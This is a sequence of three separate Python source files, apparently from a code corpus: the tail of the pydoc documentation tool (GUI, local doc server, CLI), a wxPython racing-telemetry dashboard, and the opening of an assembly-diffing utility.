selection = self.result_lst.curselection()
if selection:
modname = self.result_lst.get(selection[0]).split()[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import tkinter
try:
root = tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# --------------------------------------- enhanced Web browser interface
def _start_server(urlhandler, port):
"""Start an HTTP server thread on a specific port.
Start an HTML/text server thread, so HTML or text documents can be
browsed dynamically and interactively with a Web browser. Example use:
>>> import time
>>> import pydoc
Define a URL handler. To determine what the client is asking
for, check the URL and content_type.
Then get or generate some text or HTML code and return it.
>>> def my_url_handler(url, content_type):
... text = 'the URL sent was: (%s, %s)' % (url, content_type)
... return text
Start server thread on port 0.
If you use port 0, the server will pick a random port number.
You can then use serverthread.port to get the port number.
>>> port = 0
>>> serverthread = pydoc._start_server(my_url_handler, port)
Check that the server is really started. If it is, open browser
and get first page. Use serverthread.url as the starting page.
>>> if serverthread.serving:
... import webbrowser
The next two lines are commented out so a browser doesn't open if
doctest is run on this module.
#... webbrowser.open(serverthread.url)
#True
Let the server do its thing. We just need to monitor its status.
Use time.sleep so the loop doesn't hog the CPU.
>>> starttime = time.time()
>>> timeout = 1 #seconds
This is a short timeout for testing purposes.
>>> while serverthread.serving:
... time.sleep(.01)
... if serverthread.serving and time.time() - starttime > timeout:
... serverthread.stop()
... break
Print any errors that may have occurred.
>>> print(serverthread.error)
None
"""
import http.server
import email.message
import select
import threading
class DocHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
"""Process a request from an HTML browser.
The URL received is in self.path.
Get an HTML page from self.urlhandler and send it.
"""
if self.path.endswith('.css'):
content_type = 'text/css'
else:
content_type = 'text/html'
self.send_response(200)
self.send_header('Content-Type', '%s; charset=UTF-8' % content_type)
self.end_headers()
self.wfile.write(self.urlhandler(
self.path, content_type).encode('utf-8'))
def log_message(self, *args):
# Don't log messages.
pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
self.host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
self.address = ('', port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
self.quit = False
def serve_until_quit(self):
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd:
self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback:
self.callback(self)
class ServerThread(threading.Thread):
def __init__(self, urlhandler, port):
self.urlhandler = urlhandler
self.port = int(port)
threading.Thread.__init__(self)
self.serving = False
self.error = None
def run(self):
"""Start the server."""
try:
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
DocHandler.urlhandler = staticmethod(self.urlhandler)
docsvr = DocServer(self.port, self.ready)
self.docserver = docsvr
docsvr.serve_until_quit()
except Exception as e:
self.error = e
def ready(self, server):
self.serving = True
self.host = server.host
self.port = server.server_port
self.url = 'http://%s:%d/' % (self.host, self.port)
def stop(self):
"""Stop the server and this thread nicely"""
self.docserver.quit = True
self.serving = False
self.url = None
thread = ServerThread(urlhandler, port)
thread.start()
# Wait until thread.serving is True to make sure we are
# really up before returning.
while not thread.error and not thread.serving:
time.sleep(.01)
return thread
def _url_handler(url, content_type="text/html"):
"""The pydoc url handler for use with the pydoc server.
If the content_type is 'text/css', the _pydoc.css style
sheet is read and returned if it exits.
If the content_type is 'text/html', then the result of
get_html_page(url) is returned.
"""
class _HTMLDoc(HTMLDoc):
def page(self, title, contents):
"""Format an HTML page."""
css_path = "pydoc_data/_pydoc.css"
css_link = (
'<link rel="stylesheet" type="text/css" href="%s">' %
css_path)
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Pydoc: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
%s</head><body bgcolor="#f0f0f8">%s<div style="clear:both;padding-top:.5em;">%s</div>
</body></html>''' % (title, css_link, html_navbar(), contents)
def filelink(self, url, path):
return '<a href="getfile?key=%s">%s</a>' % (url, path)
html = _HTMLDoc()
def html_navbar():
version = html.escape("%s [%s, %s]" % (platform.python_version(),
platform.python_build()[0],
platform.python_compiler()))
return """
<div style='float:left'>
Python %s<br>%s
</div>
<div style='float:right'>
<div style='text-align:center'>
<a href="index.html">Module Index</a>
: <a href="topics.html">Topics</a>
: <a href="keywords.html">Keywords</a>
</div>
<div>
<form action="get" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Get">
</form>
<form action="search" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Search">
</form>
</div>
</div>
""" % (version, html.escape(platform.platform(terse=True)))
def html_index():
"""Module Index page."""
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
names = [name for name in sys.builtin_module_names
if name != '__main__']
contents = html.multicolumn(names, bltinlink)
contents = [heading, '<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
contents.append(html.index(dir, seen))
contents.append(
'<p align=right><font color="#909090" face="helvetica,'
'arial"><strong>pydoc</strong> by Ka-Ping Yee'
'<ping@lfw.org></font>')
return 'Index of Modules', ''.join(contents)
def html_search(key):
"""Search results page."""
# scan for modules
search_result = []
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
search_result.append((modname, desc and '- ' + desc))
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# format page
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
results = []
heading = html.heading(
'<big><big><strong>Search Results</strong></big></big>',
'#ffffff', '#7799ee')
for name, desc in search_result:
results.append(bltinlink(name) + desc)
contents = heading + html.bigsection(
'key = %s' % key, '#ffffff', '#ee77aa', '<br>'.join(results))
return 'Search Results', contents
def html_getfile(path):
"""Get and display a source file listing safely."""
path = path.replace('%20', ' ')
with tokenize.open(path) as fp:
lines = html.escape(fp.read())
body = '<pre>%s</pre>' % lines
heading = html.heading(
'<big><big><strong>File Listing</strong></big></big>',
'#ffffff', '#7799ee')
contents = heading + html.bigsection(
'File: %s' % path, '#ffffff', '#ee77aa', body)
return 'getfile %s' % path, contents
def html_topics():
"""Index of topic texts available."""
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.topics.keys())
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Topics', '#ffffff', '#ee77aa', contents)
return 'Topics', contents
def html_keywords():
"""Index of keywords."""
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.keywords.keys())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Keywords', '#ffffff', '#ee77aa', contents)
return 'Keywords', contents
def html_topicpage(topic):
"""Topic or keyword help page."""
buf = io.StringIO()
htmlhelp = Helper(buf, buf)
contents, xrefs = htmlhelp._gettopic(topic)
if topic in htmlhelp.keywords:
title = 'KEYWORD'
else:
title = 'TOPIC'
heading = html.heading(
'<big><big><strong>%s</strong></big></big>' % title,
'#ffffff', '#7799ee')
contents = '<pre>%s</pre>' % html.markup(contents)
contents = html.bigsection(topic , '#ffffff','#ee77aa', contents)
if xrefs:
xrefs = sorted(xrefs.split())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
xrefs = html.multicolumn(xrefs, bltinlink)
xrefs = html.section('Related help topics: ',
'#ffffff', '#ee77aa', xrefs)
return ('%s %s' % (title, topic),
''.join((heading, contents, xrefs)))
def html_getobj(url):
obj = locate(url, forceload=1)
if obj is None and url != 'None':
raise ValueError('could not find object')
title = describe(obj)
content = html.document(obj, url)
return title, content
def html_error(url, exc):
heading = html.heading(
'<big><big><strong>Error</strong></big></big>',
'#ffffff', '#7799ee')
contents = '<br>'.join(html.escape(line) for line in
format_exception_only(type(exc), exc))
contents = heading + html.bigsection(url, '#ffffff', '#bb0000',
contents)
return "Error - %s" % url, contents
def get_html_page(url):
"""Generate an HTML page for url."""
complete_url = url
if url.endswith('.html'):
url = url[:-5]
try:
if url in ("", "index"):
title, content = html_index()
elif url == "topics":
title, content = html_topics()
elif url == "keywords":
title, content = html_keywords()
elif '=' in url:
op, _, url = url.partition('=')
if op == "search?key":
title, content = html_search(url)
elif op == "getfile?key":
title, content = html_getfile(url)
elif op == "topic?key":
# try topics first, then objects.
try:
title, content = html_topicpage(url)
except ValueError:
title, content = html_getobj(url)
elif op == "get?key":
# try objects first, then topics.
if url in ("", "index"):
title, content = html_index()
else:
try:
title, content = html_getobj(url)
except ValueError:
title, content = html_topicpage(url)
else:
raise ValueError('bad pydoc url')
else:
title, content = html_getobj(url)
except Exception as exc:
# Catch any errors and display them in an error page.
title, content = html_error(complete_url, exc)
return html.page(title, content)
if url.startswith('/'):
url = url[1:]
if content_type == 'text/css':
path_here = os.path.dirname(os.path.realpath(__file__))
css_path = os.path.join(path_here, url)
with open(css_path) as fp:
return ''.join(fp.readlines())
elif content_type == 'text/html':
return get_html_page(url)
# Errors outside the url handler are caught by the server.
raise TypeError('unknown content type %r for url %s' % (content_type, url))
def browse(port=0, *, open_browser=True):
"""Start the enhanced pydoc Web server and open a Web browser.
Use port '0' to start the server on an arbitrary port.
Set open_browser to False to suppress opening a browser.
"""
import webbrowser
serverthread = _start_server(_url_handler, port)
if serverthread.error:
print(serverthread.error)
return
if serverthread.serving:
server_help_msg = 'Server commands: [b]rowser, [q]uit'
if open_browser:
webbrowser.open(serverthread.url)
try:
print('Server ready at', serverthread.url)
print(server_help_msg)
while serverthread.serving:
cmd = input('server> ')
cmd = cmd.lower()
if cmd == 'q':
break
elif cmd == 'b':
webbrowser.open(serverthread.url)
else:
print(server_help_msg)
except (KeyboardInterrupt, EOFError):
print()
finally:
if serverthread.serving:
serverthread.stop()
print('Server stopped')
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and x.find(os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage(Exception): pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'bgk:p:w')
writing = False
start_server = False
open_browser = False
port = None
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-b':
start_server = True
open_browser = True
if opt == '-k':
apropos(val)
return
if opt == '-p':
start_server = True
port = val
if opt == '-w':
writing = True
if start_server == True:
if port == None:
port = 0
browse(port, open_browser=open_browser)
return
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print('file %r does not exist' % arg)
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport as value:
print(value)
except (getopt.error, BadUsage):
cmd = os.path.splitext(os.path.basename(sys.argv[0]))[0]
print("""pydoc - the Python documentation tool
{cmd} <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '{sep}', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
{cmd} -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
{cmd} -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
{cmd} -b
Start an HTTP server on an arbitrary unused port and open a Web browser
to interactively browse documentation. The -p option can be used with
the -b option to explicitly specify the server port.
{cmd} -g
Deprecated.
{cmd} -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '{sep}', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""".format(cmd=cmd, sep=os.sep))
if __name__ == '__main__':
cli()
|
dashboard.py
|
from json import load
from multiprocessing import Manager, Process
from os import path
import wx
from util.led import DashLEDController
from util.telemetry import Telemetry
from util.ui import UIElements
from workers.dashboard_background import worker
class DashboardFrame(wx.Frame):
def __init__(self, *args, **kwds):
# Instantiate utility classes
self.ui = UIElements()
self.telemetry = Telemetry()
self.led_controller = DashLEDController(self.telemetry)
# Setup initial style and frame properties
kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_FRAME_STYLE | wx.STAY_ON_TOP
wx.Frame.__init__(self, *args, **kwds)
self.SetCursor(wx.Cursor(wx.CURSOR_BLANK))
# Set window properties & start timer
self._set_window_properties()
self._start_timer()
# Create the main window panel
self.main_panel = wx.Panel(self, wx.ID_ANY)
main_sizer = wx.BoxSizer(wx.VERTICAL)
# Create a horizontal sizer to hold the columns
column_sizer = wx.BoxSizer(wx.HORIZONTAL)
main_sizer.Add(column_sizer, 1, wx.EXPAND, 0)
# Create the left-side column
self.column_a = wx.BoxSizer(wx.VERTICAL)
column_sizer.Add(self.column_a, 1, wx.EXPAND, 0)
# Draw UI elements
self.ui.draw_tire_temperature_elements(self)
self.ui.draw_fuel_elements(self)
# Create the middle column
self.column_b = wx.BoxSizer(wx.VERTICAL)
column_sizer.Add(self.column_b, 1, wx.EXPAND, 0)
# Draw UI Elements
self.ui.draw_gear_and_speed_elements(self)
# Create the right-side column
self.column_c = wx.BoxSizer(wx.VERTICAL)
column_sizer.Add(self.column_c, 1, wx.EXPAND, 0)
# Draw UI Elements
self.ui.draw_lap_time_elements(self)
self.ui.draw_lap_and_position_elements(self)
# Re-size the screen as needed after elements are populated
self.main_panel.SetSizer(main_sizer)
self.Layout()
def update(self, _):
# Load a copy of the data so we know when it changes
self.telemetry.load(dashboard_data.copy())
# Ensure at least one packet has been parsed
if len(dashboard_data.keys()) == 0 or not dashboard_data['active']:
# Turn off any LEDs and stop logic
self.led_controller.clear_status()
return
# Update LED Controller status
self.led_controller.update_status()
tire_temp = self.telemetry.tire_temperature
# Tire Temp FL
fl_tire = tire_temp['FL']
self.tire_temp_FL.SetLabel(str(round(fl_tire['value'])))
self.tire_temp_FL.SetForegroundColour(wx.Colour(fl_tire['color']))
# Tire Temp FR
fr_tire = tire_temp['FR']
self.tire_temp_FR.SetLabel(str(round(fr_tire['value'])))
self.tire_temp_FR.SetForegroundColour(wx.Colour(fr_tire['color']))
# Tire Temp RL
rl_tire = tire_temp['RL']
self.tire_temp_RL.SetLabel(str(round(rl_tire['value'])))
self.tire_temp_RL.SetForegroundColour(wx.Colour(rl_tire['color']))
# Tire Temp RR
rr_tire = tire_temp['RR']
self.tire_temp_RR.SetLabel(str(round(rr_tire['value'])))
self.tire_temp_RR.SetForegroundColour(wx.Colour(rr_tire['color']))
# Update Speed & Gear
self.speed_value.SetLabel(str(dashboard_data['speed']))
self.gear_num_value.SetLabel(str(self.telemetry.gear))
# Update Fuel level values
self.total_fuel_value.SetLabel(self.telemetry.fuel_level)
self.fuel_per_lap_value.SetLabel(self.telemetry.fuel_percent_per_lap)
# Set Lap Time/Time Gain
self.lap_time_value.SetLabel(self.telemetry.lap_time)
time_gain = self.telemetry.time_gain
self.time_gain_value.SetLabel(time_gain['value'])
self.time_gain_value.SetForegroundColour(time_gain['color'])
# Set Lap Number & Position
self.lap_num_value.SetLabel(str(dashboard_data['lap_num'] + 1))
self.position_value.SetLabel(str(dashboard_data['race_position']))
def _start_timer(self, update_in_ms = 50):
'''Start the update timer to refresh values on the UI'''
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.update, self.timer)
self.timer.Start(update_in_ms)
def _set_window_properties(self):
'''Set the core window properties such as title, size, background, etc.'''
self.SetSize((800, 480))
self.SetMinSize((800, 480))
self.SetTitle("Dashboard GUI")
self.SetBackgroundColour(wx.Colour(0, 0, 0))
class DashboardApp(wx.App):
maximized = True
# OnInit is called after wx.App.__init__ is finished
def OnInit(self):
# Create the main dashboard frame
self.dashboard_frame = DashboardFrame(None, wx.ID_ANY, "")
self.SetTopWindow(self.dashboard_frame)
# Show the frame and full-screen it by default
self.dashboard_frame.Show()
self.dashboard_frame.ShowFullScreen(True, style=wx.FULLSCREEN_ALL)
# Bind to the KEY_DOWN event for keyboard shortcuts
self.Bind(wx.EVT_KEY_DOWN, self._on_key_down)
# wx requires we return a bool from our OnInit method
return True
def _on_key_down(self, event):
# Get the key code for the key pressed
key_code = self._get_key_code(event)
# Clear stints
if key_code == wx.WXK_F10:
self.dashboard_frame.telemetry.clear_stints()
# Full-screen
if key_code == wx.WXK_F11:
self.maximized = not self.maximized
self.dashboard_frame.ShowFullScreen(self.maximized, style=wx.FULLSCREEN_ALL)
# Exiting
elif key_code == wx.WXK_ESCAPE:
self.dashboard_frame.Close()
worker_process.terminate()
exit(0)
def _get_key_code(self, event):
# Printable characters
key_code = event.GetUnicodeKey()
if key_code != wx.WXK_NONE:
return key_code
# Special characters
return event.GetKeyCode()
with Manager() as manager:
# Create shared dict for the worker and UI to use
dashboard_data = manager.dict({})
# Create the base app
app = DashboardApp()
# Load the configuration for the worker
if not path.isfile('config.json'):
raise Exception('config.json file is missing - please follow setup instructions.')
with open("config.json", "r") as f:
config = load(f)
# Start the background worker process
args = (dashboard_data, config['version'], config['host'], config['port'])
worker_process = Process(target=worker, args=args)
worker_process.start()
# Run the main wx loop
app.MainLoop()
|
diff.py
|
#!/usr/bin/env python3
# PYTHON_ARGCOMPLETE_OK
import argparse
import sys
from typing import (
Any,
Callable,
Dict,
Iterator,
List,
Match,
NoReturn,
Optional,
Pattern,
Set,
Tuple,
Type,
Union,
)
def fail(msg: str) -> NoReturn:
print(msg, file=sys.stderr)
sys.exit(1)
def static_assert_unreachable(x: NoReturn) -> NoReturn:
raise Exception("Unreachable! " + repr(x))
# ==== COMMAND-LINE ====
if __name__ == "__main__":
# Prefer to use diff_settings.py from the current working directory
sys.path.insert(0, ".")
try:
import diff_settings
except ModuleNotFoundError:
fail("Unable to find diff_settings.py in the same directory.")
sys.path.pop(0)
try:
import argcomplete # type: ignore
except ModuleNotFoundError:
argcomplete = None
parser = argparse.ArgumentParser(description="Diff MIPS, PPC or AArch64 assembly.")
start_argument = parser.add_argument(
"start",
help="Function name or address to start diffing from.",
)
if argcomplete:
def complete_symbol(
prefix: str, parsed_args: argparse.Namespace, **kwargs: object
) -> List[str]:
if not prefix or prefix.startswith("-"):
# skip reading the map file, which would
# result in a lot of useless completions
return []
config: Dict[str, Any] = {}
diff_settings.apply(config, parsed_args) # type: ignore
mapfile = config.get("mapfile")
if not mapfile:
return []
completes = []
with open(mapfile) as f:
data = f.read()
# assume symbols are prefixed by a space character
search = f" {prefix}"
pos = data.find(search)
while pos != -1:
# skip the space character in the search string
pos += 1
# assume symbols are suffixed by either a space
# character or a (unix-style) line return
spacePos = data.find(" ", pos)
lineReturnPos = data.find("\n", pos)
if lineReturnPos == -1:
endPos = spacePos
elif spacePos == -1:
endPos = lineReturnPos
else:
endPos = min(spacePos, lineReturnPos)
if endPos == -1:
match = data[pos:]
pos = -1
else:
match = data[pos:endPos]
pos = data.find(search, endPos)
completes.append(match)
return completes
setattr(start_argument, "completer", complete_symbol)
parser.add_argument(
"end",
nargs="?",
help="Address to end diff at.",
)
parser.add_argument(
"-o",
dest="diff_obj",
action="store_true",
help="Diff .o files rather than a whole binary. This makes it possible to "
"see symbol names. (Recommended)",
)
parser.add_argument(
"-e",
"--elf",
dest="diff_elf_symbol",
metavar="SYMBOL",
help="Diff a given function in two ELFs, one being stripped and the other "
"one non-stripped. Requires objdump from binutils 2.33+.",
)
parser.add_argument(
"--source",
action="store_true",
help="Show source code (if possible). Only works with -o and -e.",
)
parser.add_argument(
"--source-old-binutils",
action="store_true",
help="Tweak --source handling to make it work with binutils < 2.33. Implies --source.",
)
parser.add_argument(
"--inlines",
action="store_true",
help="Show inline function calls (if possible). Only works with -o and -e.",
)
parser.add_argument(
"--base-asm",
dest="base_asm",
metavar="FILE",
help="Read assembly from given file instead of configured base img.",
)
parser.add_argument(
"--write-asm",
dest="write_asm",
metavar="FILE",
help="Write the current assembly output to file, e.g. for use with --base-asm.",
)
parser.add_argument(
"-m",
"--make",
dest="make",
action="store_true",
help="Automatically run 'make' on the .o file or binary before diffing.",
)
parser.add_argument(
"-l",
"--skip-lines",
dest="skip_lines",
type=int,
default=0,
metavar="LINES",
help="Skip the first N lines of output.",
)
parser.add_argument(
"-s",
"--stop-jr-ra",
dest="stop_jrra",
action="store_true",
help="Stop disassembling at the first 'jr ra'. Some functions have multiple return points, so use with care!",
)
parser.add_argument(
"-i",
"--ignore-large-imms",
dest="ignore_large_imms",
action="store_true",
help="Pretend all large enough immediates are the same.",
)
parser.add_argument(
"-I",
"--ignore-addr-diffs",
dest="ignore_addr_diffs",
action="store_true",
help="Ignore address differences. Currently only affects AArch64.",
)
parser.add_argument(
"-B",
"--no-show-branches",
dest="show_branches",
action="store_false",
help="Don't visualize branches/branch targets.",
)
parser.add_argument(
"-S",
"--base-shift",
dest="base_shift",
type=str,
default="0",
help="Diff position X in our img against position X + shift in the base img. "
'Arithmetic is allowed, so e.g. |-S "0x1234 - 0x4321"| is a reasonable '
"flag to pass if it is known that position 0x1234 in the base img syncs "
"up with position 0x4321 in our img. Not supported together with -o.",
)
parser.add_argument(
"-w",
"--watch",
dest="watch",
action="store_true",
help="Automatically update when source/object files change. "
"Recommended in combination with -m.",
)
parser.add_argument(
"-3",
"--threeway=prev",
dest="threeway",
action="store_const",
const="prev",
help="Show a three-way diff between target asm, current asm, and asm "
"prior to -w rebuild. Requires -w.",
)
parser.add_argument(
"-b",
"--threeway=base",
dest="threeway",
action="store_const",
const="base",
help="Show a three-way diff between target asm, current asm, and asm "
"when diff.py was started. Requires -w.",
)
parser.add_argument(
"--width",
dest="column_width",
type=int,
default=50,
help="Sets the width of the left and right view column.",
)
parser.add_argument(
"--algorithm",
dest="algorithm",
default="levenshtein",
choices=["levenshtein", "difflib"],
help="Diff algorithm to use. Levenshtein gives the minimum diff, while difflib "
"aims for long sections of equal opcodes. Defaults to %(default)s.",
)
parser.add_argument(
"--max-size",
"--max-lines",
dest="max_lines",
type=int,
default=1024,
help="The maximum length of the diff, in lines.",
)
parser.add_argument(
"--no-pager",
dest="no_pager",
action="store_true",
help="Disable the pager; write output directly to stdout, then exit. "
"Incompatible with --watch.",
)
parser.add_argument(
"--format",
choices=("color", "plain", "html"),
default="color",
help="Output format, default is color. --format=html implies --no-pager.",
)
# Project-specific flags, e.g. different versions/make arguments.
add_custom_arguments_fn = getattr(diff_settings, "add_custom_arguments", None)
if add_custom_arguments_fn:
add_custom_arguments_fn(parser)
if argcomplete:
argcomplete.autocomplete(parser)
# ==== IMPORTS ====
# (We do imports late to optimize auto-complete performance.)
import abc
import ast
from dataclasses import dataclass, field, replace
import difflib
import enum
import html
import itertools
import os
import queue
import re
import string
import subprocess
import threading
import time
MISSING_PREREQUISITES = (
"Missing prerequisite python module {}. "
"Run `python3 -m pip install --user colorama ansiwrap watchdog python-Levenshtein cxxfilt` to install prerequisites (cxxfilt only needed with --source)."
)
try:
from colorama import Fore, Style # type: ignore
import ansiwrap # type: ignore
import watchdog # type: ignore
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
# ==== CONFIG ====
@dataclass
class ProjectSettings:
arch_str: str
objdump_executable: str
build_command: List[str]
map_format: str
mw_build_dir: str
baseimg: Optional[str]
myimg: Optional[str]
mapfile: Optional[str]
source_directories: Optional[List[str]]
source_extensions: List[str]
@dataclass
class Config:
arch: "ArchSettings"
# Build/objdump options
diff_obj: bool
make: bool
source: bool
source_old_binutils: bool
inlines: bool
max_function_size_lines: int
max_function_size_bytes: int
# Display options
formatter: "Formatter"
threeway: Optional[str]
base_shift: int
skip_lines: int
show_branches: bool
stop_jrra: bool
ignore_large_imms: bool
ignore_addr_diffs: bool
algorithm: str
def create_project_settings(settings: Dict[str, Any]) -> ProjectSettings:
return ProjectSettings(
arch_str=settings.get("arch", "mips"),
baseimg=settings.get("baseimg"),
myimg=settings.get("myimg"),
mapfile=settings.get("mapfile"),
build_command=settings.get(
"make_command", ["make", *settings.get("makeflags", [])]
),
source_directories=settings.get("source_directories"),
source_extensions=settings.get(
"source_extensions", [".c", ".h", ".cpp", ".hpp", ".s"]
),
objdump_executable=get_objdump_executable(settings.get("objdump_executable")),
map_format=settings.get("map_format", "gnu"),
mw_build_dir=settings.get("mw_build_dir", "build/"),
)
def create_config(args: argparse.Namespace, project: ProjectSettings) -> Config:
formatter: Formatter
if args.format == "plain":
formatter = PlainFormatter(column_width=args.column_width)
elif args.format == "color":
formatter = AnsiFormatter(column_width=args.column_width)
elif args.format == "html":
formatter = HtmlFormatter()
else:
raise ValueError(f"Unsupported --format: {args.format}")
return Config(
arch=get_arch(project.arch_str),
# Build/objdump options
diff_obj=args.diff_obj,
make=args.make,
source=args.source or args.source_old_binutils,
source_old_binutils=args.source_old_binutils,
inlines=args.inlines,
max_function_size_lines=args.max_lines,
max_function_size_bytes=args.max_lines * 4,
# Display options
formatter=formatter,
threeway=args.threeway,
base_shift=eval_int(
args.base_shift, "Failed to parse --base-shift (-S) argument as an integer."
),
skip_lines=args.skip_lines,
show_branches=args.show_branches,
stop_jrra=args.stop_jrra,
ignore_large_imms=args.ignore_large_imms,
ignore_addr_diffs=args.ignore_addr_diffs,
algorithm=args.algorithm,
)
def get_objdump_executable(objdump_executable: Optional[str]) -> str:
if objdump_executable is not None:
return objdump_executable
for objdump_cand in ["mips-linux-gnu-objdump", "mips64-elf-objdump"]:
try:
subprocess.check_call(
[objdump_cand, "--version"],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
return objdump_cand
except subprocess.CalledProcessError:
pass
except FileNotFoundError:
pass
return fail(
"Missing binutils; please ensure mips-linux-gnu-objdump or mips64-elf-objdump exist, or configure objdump_executable."
)
def get_arch(arch_str: str) -> "ArchSettings":
if arch_str == "mips":
return MIPS_SETTINGS
if arch_str == "aarch64":
return AARCH64_SETTINGS
if arch_str == "ppc":
return PPC_SETTINGS
return fail(f"Unknown architecture: {arch_str}")
BUFFER_CMD: List[str] = ["tail", "-c", str(10 ** 9)]
# -S truncates long lines instead of wrapping them
# -R interprets color escape sequences
# -i ignores case when searching
# -c something about how the screen gets redrawn; I don't remember the purpose
# -#6 makes left/right arrow keys scroll by 6 characters
LESS_CMD: List[str] = ["less", "-SRic", "-#6"]
DEBOUNCE_DELAY: float = 0.1
# ==== FORMATTING ====
@enum.unique
class BasicFormat(enum.Enum):
NONE = enum.auto()
IMMEDIATE = enum.auto()
STACK = enum.auto()
REGISTER = enum.auto()
DELAY_SLOT = enum.auto()
DIFF_CHANGE = enum.auto()
DIFF_ADD = enum.auto()
DIFF_REMOVE = enum.auto()
SOURCE_FILENAME = enum.auto()
SOURCE_FUNCTION = enum.auto()
SOURCE_OTHER = enum.auto()
@dataclass(frozen=True)
class RotationFormat:
group: str
index: int
key: str
Format = Union[BasicFormat, RotationFormat]
FormatFunction = Callable[[str], Format]
class Text:
segments: List[Tuple[str, Format]]
def __init__(
self, line: Optional[str] = None, f: Format = BasicFormat.NONE
) -> None:
self.segments = []
if line is not None:
self.segments.append((line, f))
elif f is not BasicFormat.NONE:
raise ValueError("Text constructor provided `f`, but no line to format")
def reformat(self, f: Format) -> "Text":
return Text(self.plain(), f)
def plain(self) -> str:
return "".join(s for s, f in self.segments)
def __repr__(self) -> str:
return f"<Text: {self.plain()!r}>"
def __str__(self) -> str:
# Use Formatter.apply(...) instead
return NotImplemented
def __eq__(self, other: object) -> bool:
return NotImplemented
def __add__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
result = Text()
result.segments = self.segments + other.segments
return result
def __radd__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
result = Text()
result.segments = other.segments + self.segments
return result
def finditer(self, pat: Pattern[str]) -> Iterator[Match[str]]:
"""Replacement for `pat.finditer(text)` that operates on the inner text,
and returns the exact same matches as `Text.sub(pat, ...)`."""
for chunk, f in self.segments:
for match in pat.finditer(chunk):
yield match
def sub(self, pat: Pattern[str], sub_fn: Callable[[Match[str]], "Text"]) -> "Text":
result = Text()
for chunk, f in self.segments:
i = 0
for match in pat.finditer(chunk):
start, end = match.start(), match.end()
assert i <= start <= end <= len(chunk)
sub = sub_fn(match)
result.segments.append((chunk[i:start], f))
result.segments.extend(sub.segments)
i = end
result.segments.append((chunk[i:], f))
return result
class Formatter(abc.ABC):
@abc.abstractmethod
def apply_format(self, chunk: str, f: Format) -> str:
"""Apply the formatting `f` to `chunk` and escape the contents."""
...
@abc.abstractmethod
def table(
self, header: Optional[Tuple[str, ...]], lines: List[Tuple[str, ...]]
) -> str:
